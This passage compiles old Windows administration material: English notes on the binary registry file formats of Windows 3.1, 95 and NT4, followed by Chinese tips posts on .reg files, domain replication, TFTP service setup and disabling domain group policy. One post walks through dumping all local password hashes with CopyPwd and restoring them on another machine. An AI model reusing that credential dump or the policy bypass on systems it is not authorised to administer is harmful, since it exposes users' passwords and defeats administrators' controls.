files, which were readable but slow and limited in size (64k). In windows 95
(and NT), the registry was used instead of these files. So, to edit a
particular setting, you would have to run the application which manages these
settings. :( but what if this app won't start? MS included a tool named
REGEDIT in windows 3.?? and 95, and a REGEDT32 in windows NT. You can use
these apps to edit ALL contents of the registry (in windows NT the registry
supports security, as well as it provides the security for the whole system!)
An application can open a "key", write values (variables) to it and fill them
with data. Each key represents also a value called "default" and can contain
any number of sub-keys. This will form a tree-structure as you can see at
the left half of REGEDIT. (note: REGEDIT from windows 3.?? has to be started
with /V or /Y, I can't remember now)
Where can I find the registry???
================================
That differs for each windows-version:
Version File(s) Contents
3.1x REG.DAT Complete windows 3.?? Registry
95 SYSTEM.DAT System-values (HKEY_LOCAL_MACHINE)
USER.DAT User-values (HKEY_USERS)
NT SYSTEM32\CONFIG\SAM SAM-part of the registry (=NT Security)
SYSTEM32\CONFIG\SOFTWARE Software-Specific part
(HKEY_LOCAL_MACHINE\SOFTWARE)
SYSTEM32\CONFIG\SYSTEM System-specific part
(HKEY_LOCAL_MACHINE\System)
PROFILES\%USERNAME%\NTUSER.DAT User-Specific part
(HKEY_CURRENT_USER\{S-1-xxx...})
PROFILES\%USERNAME%\NTUSER.MAN like NTUSER.DAT but a
MANDATORY-profile
If you are using a ROAMING-profile with windows NT, NTUSER.xxx can be on
a network-share as well...
Terms
=====
The registry consists of the following elements:
Hive: strating point of the structure. The name of an hive starts
with the "HKEY_"-prefix. Can be seen as a "drive" in a file
system.
Hive name Beschreibung 3.1 95 NT4
HKEY_CLASSES_ROOT Points to the "class" key in
the "HKEY_LOCAL_MACHINE" hive,
the only hive in windows 3.?? X X X
HKEY_CURRENT_USER Information and settings valid
for the currently logged in
user. (Points to the correct X X
key under "HKEY_USERS")
HKEY_CURRENT_CONFIG Settings for the currently
active hardware profile.
Points to "HKEY_LOCAL_MACHINE\ X X
CONTROL\CONTROLSETxxx
HKEY_USERS Contains all currently active
user settings. Since NT is a
single user system, there
will be only one key (the S-ID X X
of the active user), and a
".DEFUALT" key (The settings
for the CTRL-ALT-DEL environment)
HKEY_LOCALMACHINE All local settings X X
HKEY_DYN_DATA As the name says, here you'll find X
dynamic data (CPU-usage,...)
Key: A key to the registry can be seen as a directory in a file
system.
Value: can be seen as the registrys "file"
Data: is the actual setting, can be seen as the contents of a
file
Windows 3.x
===========
This registry is the easiest one. It consists of 3 blocks, which are not
"signed" at all:
Block Position Size
Header 0 32 Bytes
Navigation-Info 0x00000020 ???
Data-Block ??? ???
The "???" marked values can be read from the header.
Header
======
Offset Size Description
0x0000 8 Byte ASCII-Text: "SHCC3.10"
0x0008 D-Word ?
0x000C D-Word ? (always equal the D-Word at 0x0008)
0x0010 D-Word Number of entrys in the navigation-block
0x0014 D-Word Offset of the data-block
0x0018 D-Word Size of the data-block
0x001C Word ?
0x001E Word ?
Values marked "?" are not important for a read-access, and therefore unknown
to me...
Navigation-Block
================
This is where chaos rules! It consists of two different, 8 byte long blocks:
* Navigation-Info-Record,
* Text-Info-Record
The first record in the navigation block is a navigation info record.
Navigation-Info-Record
Offset Size Contents
0x00 Word Next Key (same level)
0x02 Word First Sub-Key (one level deeper)
0x04 Word Text-Info-Record Key-Namens
0x06 Word Text-Info-Record Key-Value (default)
The values are the locical number of the block inside the file:
offset=blocksize*blocknumber+headersize
since 2 of this values are constant:
offset=8*blocknumber+0x20
Text-Info-Record
================
Offset Size Contents
0x00 Word ?
0x02 Word number of references to this text
0x04 Word Text-length
0x06 Word Offset of the text-string inside the data-block
To get the text-offset inside the file you have to add this offset to the
data-offset inside the header.
Data-Block
==========
The data-block only consists of a collection of text-strings. Right in front
of every text is a word which may or may not have a meaning. The offset in
the text-info record points directly to the text, the text-size has to be
defined in the text-info record too.
Windows 95
==========
the Windows95-Registry Files:
inside the windows-directory (default: C:\WINDOWS) are 2 files which are
loaded to form the registry:
SYSTEM.DAT
and
USER.DAT
This files are mapped to the following hives:
HKEY_LOCAL_MACHINE in SYSTEM.DAT
and
HKEY_USERS in USER.DAT
The file structure:
===================
Both files have the same structure. Each of them consists of 3 blocks where
1 of these blocks can be repeated.
Every block has a 4 byte long signature to help identify its contents.
ID Block-contents Max. size
CREG Header 32 Bytes @ Offset 0
RGKN Directory information
(Tree-structure) ??? @ Offset 32
RGDB The real data
(Values and data) max. 65535 Bytes an Offset ??
these blocks are "sticked together" with no space between them, but always
a multiple of 16 in size.
the CREG-Block
==============
Offset Size Inhalt
0x00000000 D-Word ASCII-"CREG" = 0x47455243
0x00000008 D-Word Offset of 1st RGDB-block
0x00000010 D-Word # of RGDB-blocks
all other values are not needed to read the registry...
the RGKN-Block
==============
I assume that RGKN stands for ReGistry-Key-Navigation. This block contains
the information needed to built the tree-structure of the registry. This
block will be larger then 65536 bytes (0xFFFF)!
All offset-values are RELATIVE to the RGKN-block!
Offset Size Contents
0x00000000 D-Word ASCII-"RGKN" = 0x4E4B4752
0x00000004 D-Word Size of the RGKN-block in bytes
0x00000008 D-Word Rel. Offset of the root-record
0x00000020 ???? Tree-Records (often the 1st Record)
the Tree-Record
===============
The tree-record is a "complete" registry-key. It contains the "hash"-info
for the real data stored in this key.
Offset Size Contents
0x0000 D-Word Always 0
0x0004 D-Word Hash of the key-name
0x0008 D-Word Always -1 (0xFFFFFFFF)
0x000C D-Word Offset of the owner (parent)-records
0x0010 D-Word Offset of the 1st sub-sey record
0x0014 D-Word Offset of the next record in this level
0x0018 D-Word ID-number of the real key
the 1st entry in a "usual" registry file is a nul-entry with subkeys: the
hive itself. It looks the same like other keys. Even the ID-number can
be any value.
The "hash"-value is a value representing the key's name. Windows will not
search for the name, but for a matching hash-value. if it finds one, it
will compare the actual string info, otherwise continue with the next key.
End of list-pointers are filled with -1 (0xFFFFFFFF)
The ID-field has the following format:
Bits 31..16: Number of the corresponding RGDB-blocks
Bits 15..0: continuous number inside this RGDB-block.
The hash-method:
================
you are looking for the key: Software\Microsoft
first you take the first part of the string and convert it to upper case
SOFTWARE
The "\" is used as a seperator only and has no meaning here.
Next you initialize a D-Word with 0 and add all ASCII-values of the string
which are smaller than 0x80 (128) to this D-Word.
SOFTWARE = 0x0000026B
Now you can start looking for this hash-value in the tree-record.
If you want to modify key names, also modify the hash-values, since they
cannot be found again (although they would be displayed in REGEDIT)
the RGDB-Block
==============
Header:
Offset Size Contents
0x0000 D-Word ASCII-"RGDB" = 0x42444752
0x0004 D-Word Size of this RGDB-block
0x0020 ???? RGDB Records
RGDB-Record (Key-Information)
=============================
Offset Size Contents
0x0000 D-Word record length in bytes
0x0004 D-Word ID-number
0x0008 D-Word ??? Size ???
0x000C Word text length of key name
0x000E Word Number of values inside this key
0x0010 D-Word always 0
0x0014 ???? Key-name
0x???? ???? Values
The first size (record length) can be used to find the next record.
The second size value is only correct if the key has at least one value,
otherwise it is a little lower.
The key-name is not 0-terminated, its length is defined by the key-
text length field. The values are stored as records.
Value-Record
============
Offset Size Contents
0x0000 D-Word Type of data
0x0004 D-Word always 0
0x0008 Word length of value-name
0x000A Word length of value-data
0x000C ???? value-name
0x???? ???? data
Data-Types
==========
value Contents
0x00000001 RegSZ - 0-terminated string (sometimes without the 0!)
0x00000003 RegBin - binary value (a simple data-block)
0x00000004 RegDWord - D-Word (always 4 bytes in size)
Windows NT (Version 4.0)
========================
Whoever thought that the registry of windows 95 and windows nt are similar
will be surprised! They only look much the same, but have completely other
structures!
Since the RGDB-blocks in the windows 95 registry are not larger than
0xFFFF, we can see that it is optimized for a 16-bit OS...
Windows NT stores its registry in a page-oriented format with blocks
of 4kb (4096 = 0x1000 bytes)
The windows NT registry has 2 different blocks, where one can occure many
times...
the "regf"-Block
================
"regf" is obviosly the abbreviation for "Registry file". "regf" is the
signature of the header-block which is always 4kb in size, although only
the first 64 bytes seem to be used and a checksum is calculated over
the first 0x200 bytes only!
Offset Size Contents
0x00000000 D-Word ID: ASCII-"regf" = 0x66676572
0x00000004 D-Word ????
0x00000008 D-Word ???? Always the same value as at 0x00000004
0x0000000C Q-Word last modify date in WinNT date-format
0x00000014 D-Word 1
0x00000018 D-Word 3
0x0000001C D-Word 0
0x00000020 D-Word 1
0x00000024 D-Word Offset of 1st key record
0x00000028 D-Word Size of the data-blocks (Filesize-4kb)
0x0000002C D-Word 1
0x000001FC D-Word Sum of all D-Words from 0x00000000 to 0x000001FB
I have analyzed more registry files (from multiple machines running
NT 4.0 german version) and could not find an explanation for the values
marked with ???? the rest of the first 4kb page is not important...
the "hbin"-Block
================
I don't know what "hbin" stands for, but this block is always a multiple
of 4kb in size.
Inside these hbin-blocks the different records are placed. The memory-
management looks like a C-compiler heap management to me...
hbin-Header
===========
Offset Size Contents
0x0000 D-Word ID: ASCII-"hbin" = 0x6E696268
0x0004 D-Word Offset from the 1st hbin-Block
0x0008 D-Word Offset to the next hbin-Block
0x001C D-Word Block-size
The values in 0x0008 and 0x001C should be the same, so I don't know
if they are correct or swapped...
From offset 0x0020 inside a hbin-block data is stored with the following
format:
Offset Size Contents
0x0000 D-Word Data-block size
0x0004 ???? Data
If the size field is negative (bit 31 set), the corresponding block
is free and has a size of -blocksize!
The data is stored as one record per block. Block size is a multiple
of 4 and the last block reaches the next hbin-block, leaving no room.
Records in the hbin-blocks
==========================
nk-Record
The nk-record can be treated as a kombination of tree-record and
key-record of the win 95 registry.
lf-Record
The lf-record is the counterpart to the RGKN-record (the hash-function)
vk-Record
The vk-record consists information to a single value.
sk-Record
sk (? Security Key ?) is the ACL of the registry.
Value-Lists
The value-lists contain information about which values are inside a
sub-key and don't have a header.
Datas
The datas of the registry are (like the value-list) stored without a
header.
All offset-values are relative to the first hbin-block and point to the block-
size field of the record-entry. to get the file offset, you have to add
the header size (4kb) and the size field (4 bytes)...
the nk-Record
=============
Offset Size Contents
0x0000 Word ID: ASCII-"nk" = 0x6B6E
0x0002 Word for the root-key: 0x2C, otherwise 0x20
0x0004 Q-Word write-date/time in windows nt notation
0x0010 D-Word Offset of Owner/Parent key
0x0014 D-Word number of sub-Keys
0x001C D-Word Offset of the sub-key lf-Records
0x0024 D-Word number of values
0x0028 D-Word Offset of the Value-List
0x002C D-Word Offset of the sk-Record
0x0030 D-Word Offset of the Class-Name
0x0044 D-Word Unused (data-trash)
0x0048 Word name-length
0x004A Word class-name length
0x004C ???? key-name
the Value-List
==============
Offset Size Contents
0x0000 D-Word Offset 1st Value
0x0004 D-Word Offset 2nd Value
0x???? D-Word Offset nth Value
To determine the number of values, you have to look at the
owner-nk-record!
Der vk-Record
=============
Offset Size Contents
0x0000 Word ID: ASCII-"vk" = 0x6B76
0x0002 Word name length
0x0004 D-Word length of the data
0x0008 D-Word Offset of Data
0x000C D-Word Type of value
0x0010 Word Flag
0x0012 Word Unused (data-trash)
0x0014 ???? Name
If bit 0 of the flag-word is set, a name is present, otherwise the
value has no name (=default)
If the data-size is lower 5, the data-offset value is used to store
the data itself!
The data-types
==============
Wert Beteutung
0x0001 RegSZ: character string (in UNICODE!)
0x0002 ExpandSZ: string with "%var%" expanding (UNICODE!)
0x0003 RegBin: raw-binary value
0x0004 RegDWord: Dword
0x0007 RegMultiSZ: multiple strings, seperated with 0
(UNICODE!)
The "lf"-record
===============
Offset Size Contents
0x0000 Word ID: ASCII-"lf" = 0x666C
0x0002 Word number of keys
0x0004 ???? Hash-Records
Hash-Record
===========
Offset Size Contents
0x0000 D-Word Offset of corresponding "nk"-Record
0x0004 D-Word ASCII: the first 4 characters of the key-name,
padded with 0's. Case sensitiv!
Keep in mind, that the value at 0x0004 is used for checking the
data-consistency! If you change the key-name you have to change the
hash-value too!
The "sk"-block
==============
(due to the complexity of the SAM-info, not clear jet)
Offset Size Contents
0x0000 Word ID: ASCII-"sk" = 0x6B73
0x0002 Word Unused
0x0004 D-Word Offset of previous "sk"-Record
0x0008 D-Word Offset of next "sk"-Record
0x000C D-Word usage-counter
0x0010 D-Word Size of "sk"-record in bytes
????
???? ???? Security and auditing settings...
????
The usage counter counts the number of references to this
"sk"-record. You can use one "sk"-record for the entire registry!
Windows nt date/time format
===========================
The time-format is a 64-bit integer which is incremented every
0,0000001 seconds by 1 (I don't know how accurate it realy is!)
It starts with 0 at the 1st of january 1601 0:00! All values are
stored in GMT time! The time-zone is important to get the real
time!
Common values for win95 and win-nt
==================================
Offset values marking an "end of list", are either 0 or -1 (0xFFFFFFFF).
If a value has no name (length=0, flag(bit 0)=0), it is treated as the
"Default" entry...
If a value has no data (length=0), it is displayed as empty.
simplyfied win-3.?? registry:
=============================
+-----------+
| next rec. |---+ +-----> +------------+
| first sub | | | | Usage cnt. |
| name | | +--> +------------+ | | length |
| value | | | | next rec. | | | text |-------> +-------+
+-----------+ | | | name rec. |--+ +------------+ | xxxxx |
+------------+ | | value rec. |--------> +------------+ +-------+
v | +------------+ | Usage cnt. |
+-----------+ | | length |
| next rec. | | | text |-------> +-------+
| first sub |------+ +------------+ | xxxxx |
| name | +-------+
| value |
+-----------+
Greatly simplyfied structure of the nt-registry:
================================================
+-------------------------------------------------------------------------+
v |
+---------------+ +-------------> +-----------+ +------> +---------+ |
| "nk" | | | lf-rec. | | | nk-rec. | |
| ID | | | # of keys | | | parent |---+
| Date | | | 1st key |--+ | .... |
| parent | | +-----------+ +---------+
| suk-keys |-------+
| values |---------------------> +----------+
| SK-rec. |---------------+ | 1. value |--> +----------+
| class |--+ | +----------+ | vk-rec. |
+---------------+ | | | .... |
v | | data |--> +-------+
+------------+ | +----------+ | xxxxx |
| Class name | | +-------+
+------------+ |
v
+---------+ +---------+
+-----> | next sk |---> | Next sk |--+
| +---| prev sk | <---| prev sk | |
| | | .... | | ... | |
| | +---------+ +---------+ |
| | ^ |
| +--------------------+ |
+------------------------------------+
--------------------------------------------------------------------------------
Hope this helps.... (Although it was "fun" for me to uncover this things,
it took me several sleepless nights ;)
「.reg」文件全攻略
Author: joyadam@myrealbox.com
Date: 2002-1-13 18:34:59
有的時候爲了方便修改註冊表,咱們會製做一些腳本,可是無論是inf文件仍是vbs腳本,我以爲仍是隻有.reg文件是最方便的。
關於註冊表的操做,常見的是建立、修改、刪除。
--建立
建立分爲兩種,一種是建立子項(Subkey)
注:若是你對註冊表的命名不是很清楚,能夠看看註冊表命名標準手冊(http://www.sometips.com/tips/registryhack/204.htm)
咱們建立一個文件,內容以下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Test4Adam]
而後執行該腳本,你就已經在HKEY_LOCAL_MACHINE\SOFTWARE\下建立了一個名字爲「Test4Adam」的子項。
另外一種是建立一個項目名稱
那這種文件格式就是典型的文件格式,和你從註冊表中導出的文件格式一致,內容以下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Test4Adam]
"Test1"="Adam"
"Test2"=hex:61
"Test3"=dword:00000064
Test1的類型是「String Value」
Test2的類型是「Binary Value」
Test3的類型是「DWORD Value」
注意:若是你的註冊表中不存在Test4Adam這個子項,那麼該腳本會爲你建立該子項。
--修改
修改相對來講比較簡單,只要把你須要修改的項目導出,而後用記事本進行修改,而後導入便可,在此我就再也不贅述。
--刪除
咱們首先來講說刪除一個項目名稱,咱們建立一個以下的文件:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Test4Adam]
"Test1"=-
執行該腳本,HKEY_LOCAL_MACHINE\SOFTWARE\Test4Adam下的"Test1"就被刪除了;
咱們再看看刪除一個子項,咱們建立一個以下的腳本:
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE\SOFTWARE\Test4Adam]
執行該腳本,HKEY_LOCAL_MACHINE\SOFTWARE\Test4Adam就已經被刪除了。
相信看到這裏,.reg文件你基本已經掌握了。
最後,在此感謝John Savill。
Active Directory中如何使用單獨的端口進行域複製?
Author: joyadam@myrealbox.com
Date: 2002-1-13 18:34:59
AD中域複製使用動態RPC,端口不惟一,在部署防火牆時每每會無所適從,可是咱們能夠經過修改Domain controller的註冊表來實如今一個端口來進行域複製:
HKLM\CurrentControlSet\Service\NTDS\Parameters
添加一個新的鍵「TCP/IP Port」,而後將該鍵的值設置爲你所想要的端口(最好是大於1024),而後從新啓動機器便可。
創建註冊DLL和反註冊DLL文件的快捷方式
Author: joyadam@myrealbox.com
Date: 2002-1-13 18:34:58
DLL files Register and Unregister
有的程序員常常要註冊或者反註冊本身寫的dll文件,加一個快捷方式會減小本身的工做量:
[HKEY_CLASSES_ROOT\dllfile\shell\Unregister]
"Command"="regsvr32 %1 /u"
[HKEY_CLASSES_ROOT\dllfile\shell\Register]
"Command"="regsvr32 %1"
當咱們須要註冊或者反註冊dll時,只要在該dll文件上按下鼠標右鍵便可!
NT的註冊表文件存放位置
Author: joyadam@myrealbox.com
Date: 2002-1-13 18:34:57
%system%\system32\config目錄下有這樣一些文件
sam.* Security Account Manager,安全賬號管理器
default.* 默認註冊表文件
security.* 安全性註冊文件
system.* 系統註冊文件
software.* 應用軟件註冊表文件
註冊表中最重要的文件是那些沒有擴展名的文件,也就是當前註冊表文件。還有一個名爲system.alt文件,這個就是註冊表的副本。
%system%\system32\config目錄下擴展名爲log或sav的文件中包含的是歷史信息,
能夠經過時間瀏覽器來查看。好比:.sav文件是在最近一次系統正常引導過程當中保
存的,而.log文件則記錄了註冊表審覈功能啓用過程當中對註冊表所進行的修改。
雖然你能夠刪除.log和.sav文件能夠刪除,可是我並不但願你珍惜這一點點磁盤空
間。
注意:不要替換註冊表文件的某一個或者某幾個文件,這樣會形成註冊表文件的不
同步,極易形成系統的崩潰。
禁止使用域的組策略
Author: joyadam@myrealbox.com
Date: 2002-1-13 18:34:56
Hive: HKEY_LOCAL_MACHINE
Key: Software\Policies\Microsoft\Windows\System
Name: DisableGPO
Type: REG_DWORD
Value: 1
Windows 2000註冊表數據類型
Author: joyadam@myrealbox.com
Date: 2002-1-13 18:34:55
Data Types in the Windows 2000 Registry
Data types define what kind of data an entry can store. The following data types are used by entries in the Windows 2000 registry:
REG_BINARY
Raw binary data. Most hardware component information is stored as binary data. It can be displayed in an easy-to-read format by using Windows 2000 Diagnostics. REG_BINARY data can be displayed and entered in binary or hexadecimal format in a registry editor.
For example,
PagingFiles.
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management
Data type Range Default value
REG_BINARY Name Minimum(MB) Maximum(MB) C:\Pagefile.sys 27 77
REG_DWORD
Data represented by a number that is 4 bytes (32 bits) long. Boolean (0 or 1) values and many entries for device drivers and services take this data type. REG_DWORD data can be displayed in binary, hexadecimal, or decimal format in a registry editor.
For example,
ActivityLogFlag
HKLM\SYSTEM\CurrentControlSet\Services\DhcpServer\Parameters
Data type Range Default value
REG_DWORD 0 | 1 0
REG_DWORD_LITTLE_ENDIAN
Same as REG_DWORD. A 32-bit number in which the most significant byte is displayed as the leftmost or high-order byte. This is the most common format for storing numbers in computers running Windows 2000 and Windows 98.
REG_DWORD_BIG_ENDIAN
A 32-bit number in which the most significant byte is displayed as the rightmost or low-order byte. This is opposite of the order in which bytes are stored in the REG_DWORD and REG_DWORD_LITTLE_ENDIAN data types.
REG_EXPAND_SZ
A variable-length text string. REG_EXPAND_SZ data can include variables that are resolved when an application or service uses the data. For example, the value of File includes the variable Systemroot.
For Example,
When the Event Log service references the File entry, this variable is replaced by the name of the directory containing the Windows 2000 system files.
HKLM\SYSTEM\CurrentControlSet\Services\EventLog\File Replication Service
File entry:
Data type Range Default value
REG_EXPAND_SZ Path and file name %SystemRoot%\system32\config\NtFrs.Evt
REG_LINK
Indicates a symbolic link between system or application data and a registry value. You can use Unicode characters in a REG_LINK entry.
REG_MULTI_SZ
Multiple text strings formatted as an array of null-terminated strings, and terminated by two null characters. Values that contain lists or multiple values in a form that people can read usually take this data type. The values in a REG_MULTI_SZ entry can be separated by spaces, commas or other marks.
For example, the value of Machine is a list of paths accessible by all remote users of Windows 2000.
HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg\AllowedPaths
Machine
Data type Range Default value
REG_MULTI_SZ Registry paths SYSTEM\CurrentControlSet\Control\ProductOptions
SYSTEM\CurrentControlSet\Control\Print\Printers
SYSTEM\CurrentControlSet\Services\Eventlog
SOFTWARE\Microsoft\Windows NT\CurrentVersion
REG_SZ
A fixed-length text string. Boolean ("True" or "False") values and other short text values usually have this data type.
For example,
Wallpaper
HKCU\Control Panel\Desktop
Data type Range Default value
REG_SZ [Path]File name | (Blank value) 空值
REG_FULL_RESOURCE_DESCRIPTOR
A series of nested arrays designed to store a resource list for a hardware component or driver. For example, in Regedt32, double-click ConfigurationData (in HKEY_LOCAL_MACHINE\Hardware\Description\System \MultifunctionAdapter\0\ControllerName\0).
regedit.exe的參數
Author: joyadam@myrealbox.com
Date: 2002-1-13 18:34:55
filename 導入 .reg 文件進註冊表
/s 導入 .reg 文件進註冊表(安靜模式)
/e 導出註冊表文件
例:regedit /e filename.reg HKEY_LOCAL_MACHINE\SYSTEM
/L:system 指定 system.dat
/R:user 指定 user.dat
/C 壓縮 [文件名] (Windows 98)
還有一些參數也是能夠用的,好比/a,可是我嘗試後發現功能無非就是上述這些!並且測試參數很容易致使你的註冊表加倍龐大,實在是一個很危險的工做。
不過也不會致使系統崩潰,你們膽子大的就大膽去try吧!
從新安裝 Windows 2000 後密碼的恢復
Author: Adam
Date: 2002-2-3 2:35:47
在Windows 2K 的平常管理中,咱們無可避免地會碰到從新安裝Windows 2K 的時候,資料的備份能夠有不少方式實現,用戶的屬性備份也能夠經過 ADSI 腳本或者經過 Addusers 工具(見Windows 2000 Resource Kits)來實現,可是用戶的密碼,咱們可能必須從新設置了,對於一臺擁有上百用戶的服務器來講,用戶的抱怨將會給管理員帶來很大的壓力和麻煩,如今給你們推薦一款不錯的好東東--CopyPwd,用來備份用戶的密碼。
下載地址:
http://www.sometips.com/soft/copypwd.zip
(老外仍是比較牛,一個多禮拜就完成了這個玩藝的開發,內附源代碼)
下面介紹一下用來做實驗的兩臺機器,一臺是中文Windows 2000 Server(取名爲S1),一臺是中文Windows 2000 Pro(取名爲S2),兩臺皆爲StandAlone的機器。固然,這個工具也能用在NT4的StandAlone和域結構中,可是偶沒有進行過測試。
閒話少說,開始實驗:咱們首先在S1上進行以下的操做:
D:\copypwd>net user adam ILoveAdam! /add
命令成功完成。
//建立用戶adam,密碼爲"ILoveAdam!"
D:\copypwd>copypwd.exe dump > copypwd.txt
//將S1全部用戶密碼dump出來,不要修改copypwd.txt這個文件名,btw,若是這個操做在你的機器上沒法完成的話,你能夠離開本頁繼續到浩瀚無垠的Internet上繼續遨遊了,Forgot me,就像忘記清晨開放在你窗前的那朵小花... :)
D:\copypwd>notepad copypwd.txt
//修改copypwd.txt文件,將與adam無關的行刪除並存盤,因爲咱們在測試的時候只對一個用戶進行測試,因此只保留了adam一行,若是你須要備份多個用戶,你能夠保留與那些用戶相關的lines
咱們將操做轉移到 S2 上,首先咱們能夠測試一下 S2 上是否能夠執行 copypwd dump,若是不行,你就自認倒黴吧,至於爲何有的機器能執行有的機器不能執行不在本文討論範圍之列,你們能夠與 PWDump的做者-Jeremy Allison <jra@cygnus.com> 聯繫。
C:\>net user adam ILoveAdam! /add
命令成功完成。
//建立一個 adam 賬號,在這裏咱們使用的net user建立的該賬號,固然,咱們也能夠用 AddUsers來建立,這樣咱們能保留更多與用戶相關的諮詢,AddUser 具體使用能夠參見Windows 2000 Resources Kits的手冊。
C:\>copy file://192.168.X.X/copypwd/copypwd.txt .
已複製 1 個文件。
//將備份的copypwd.txt文件複製到 S2
C:\>copypwd.exe set
Set password for user adam
//密碼恢復成功,無論你在 S2 上建立的密碼是什麼,如今的密碼都是 "ILoveAdam!"
須要值得注意的一點,在咱們實施完該操做後,該用戶的"User must change password at next logon"開關被Enable了,因此在測試的時候會碰到一些問題,所以咱們必須在用戶管理器中Uncheck這個選項,固然,咱們也能夠經過命令行的方式來實現,因此在這裏推薦一個Resource Kits裏面的一個工具 cusrmgr,首先看看它的幫助:
CUsrMgr Ver 1.0 Jan98 by G.Zanzen (c) MCS Central Europe
Sets a random password to a user
usage: -u UserName [-m file://MachineName/] \\ default LocalMachine
Resetting Password Function
-p Set to a random password
-P xxx Sets password to xxx
User Functions
-r xxx Renames user to xxx
-d xxx deletes user xxx
Group Functions
-rlg xxx yyy Renames local group xxx to yyy
-rgg xxx yyy Renames global group xxx to yyy
-alg xxx Add user (-u UserName) to local group xxx
-agg xxx Add user (-u UserName) to global group xxx
-dlg xxx deletes user (-u UserName) from local group xxx
-dgg xxx deletes user (-u UserName) from global group xxx
SetProperties Functions
-c xxx sets Comment to xxx
-f xxx sets Full Name to xxx
-U xxx sets UserProfile to xxx
-n xxx sets LogonScript to xxx
-h xxx sets HomeDir to xxx
-H x sets HomeDirDrive to x
+s xxxx sets property xxxx
-s xxxx resets property xxxx
where xxxx can be any of the following properties:
MustChangePassword
CanNotChangePassword
PasswordNeverExpires
AccountDisabled
AccountLockout
RASUser
【老規矩,字數不夠幫助湊】
咱們激活用戶的語法是:
D:\copypwd>cusrmgr -u adam -s MustChangePassword
這樣,咱們的操做就完成了...
【後記】
須要感謝的是 Chuck McCullough<chuck@systemtools.com>,偶這個想法在多年前就有了,該死的一直叮叮不幫我寫代碼,而Shotgun這個鳥人如今號稱只作開發管理,再也不Coding,因此只有靠老外了...你們有興趣也能夠研究一下老外的代碼...有什麼心得也可讓偶學習學習...
Windows NT 4.0在安裝SP5/SP6時,系統報告說使用了高等級的加密包而中斷Service Pack的安裝?
Author: Adam
Date: 2002-1-13 18:35:04
若是你在你的Windows NT 4.0安裝了IE 5.5或更高版本後,再安裝Service Pack,你會收到以下的錯誤:
You have chosen to install a version of the Service Pack with Standard Encryption onto a system with High Encryption. This is not supported. To successfully install this version of the Service Pack, you must install the High Encryption version. Press Help for more information about obtaining the High Encryption Version of this Service Pack. Service Pack Setup will now exit.
之前在論壇有人提出將%systemroot%\system32目錄下的schannel.dll替換成之前版本的dll文件便可安裝,可是若是你管理的公司有10臺或以上這樣的Windows NT,這樣將會大大的增長你的工做量,因此,我推薦你使用如下的方法:
1.首先將Service Pack解包(執行SP5.exe /x,指定目錄爲此c:\temp\sp)
2.修改c:\temp\sp\i386\update\update.inf文件
3.找到[CheckSecurity.System32.files]
4.在如下行的前面添加一個分號
Schannel.dll
Security.dll
Ntlmssps.dll
5.使用update.exe來安裝Service Pack
如何爲Windows 2000建立一個tftp service
Author: Adam
Date: 2002-1-13 18:35:04
近日在論壇老是看到有人問怎麼啓動Win2K下的TFTP服務,其實在默認狀況下TFTP服務是沒有安裝的,只有在使用RIS服務的時候纔會安裝該服務(國內不多有人用這個玩藝,可能我是井底之蛙吧),如今我給你們示範如何來安裝一個tftp服務(若是你有須要的話,閣下是網管仍是XX呢?)
咱們首先找到系統中的tftpd.exe文件,通常咱們能夠在%systemroot%\system32\dllcache目錄下找到該文件,建議把該文件copy到其餘目錄。
C:\>copy %systemroot%\system32\dllcache\tftpd.exe %systemroot%\system32
已複製 1 個文件。
咱們會用Windows 2000下的Resource Kits中的一個工具instsrv建立一個服務,instsrv的用法以下,固然,你也能夠用其餘的工具來實現(如srvinstw,GUI方式的)。
C:\>instsrv
Installs and removes system services from NT
INSTSRV <service name> (<exe location> | REMOVE)
[-a <Account Name>] [-p <Account Password>]
Install service example:
INSTSRV MyService C:\MyDir\DiskService.Exe
-OR-
INSTSRV MyService C:\mailsrv\mailsrv.exe -a MYDOMAIN\joebob -p foo
Remove service example:
INSTSRV MyService REMOVE
[俺的特點:字不夠,幫助湊!]
添加一個服務,注意,該服務建立侯爲自動啓動。
C:\>instsrv tftp c:\winnt\system32\tftpd.exe
The service was successfuly added!
Make sure that you go into the Control Panel and use
the Services applet to change the Account Name and
Password that this newly installed service will use
for its Security Context.
啓動服務
C:\>net start tftp
tftp 服務正在啓動 .
tftp 服務已經啓動成功。
測試服務是否正常工做
C:\>tftp -i 61.135.21.195 PUT sometips.gif sometips.gif
Transfer successful: 4209 bytes in 1 second, 4209 bytes/s
C:\>dir tftpdroot
驅動器 C 中的卷是 C
卷的序列號是 1E23-1907
C:\tftpdroot 的目錄
2001-09-22 01:14 <DIR> .
2001-09-22 01:14 <DIR> ..
2001-09-22 01:14 4,209 sometips.gif
1 個文件 4,209 字節
2 個目錄 94,113,792 可用字節
注意,若是你上傳文件,系統會在%systemdrive%自動建立一個名爲tftproot的目錄,OK,全部的工做已經完成了!
Enjoy it!
注:俺在網上沒有找到任何相關的資料,我猜測tftpd應該還有一些參數,好比指定tftproot目錄等等,我按unix下的in.tftpd的參數測試了一下,沒有成功,你們有興趣就本身測試一下吧!:)
爲何我瀏覽網上鄰居的時候很慢?怎樣解決?
Author: momo
Date: 2002-1-13 18:35:03
:由於經過網上鄰居瀏覽其它計算機的時候,2000會縣搜索本身的共享目錄和可做爲網絡共享的打印機以及計劃任務中和網絡相關的計劃任務,因此致使速度慢。
啓動註冊表編輯器regedit
找到 HKEY_LOCAL_MACHINE/sofeware/Microsoft/Windows/Current Version/Explore/RemoteComputer/NameSpace
刪除{2227A280-3AEA-1069-A2DE08002B30309D}(打印機)
刪除{D6277990-4C6A-11CF8D87-00AA0060F5BF}(計劃任務)
再次打開的時候就會發現速度比之前提升不少了。
Netlogon Error Message
Author: Feras Sabha
Date: 2002-1-13 18:35:03
We recently enhanced our network with switched Ethernet technology. All the servers and workstations in the network run Windows NT 4.0 with the latest service pack. Although this enhancement provided a faster network, it presented a problem that hadn't previously occurred.
When booted, some of the faster workstations in the network (Pentium III processor—class systems) reported a Netlogon error (event ID 5719—No Windows NT Domain Controller is available for domain) in the System event log. Sometimes, if the user logged off and logged on again without restarting the computer, all services would start without problems. None of the slower computers produced this error message.
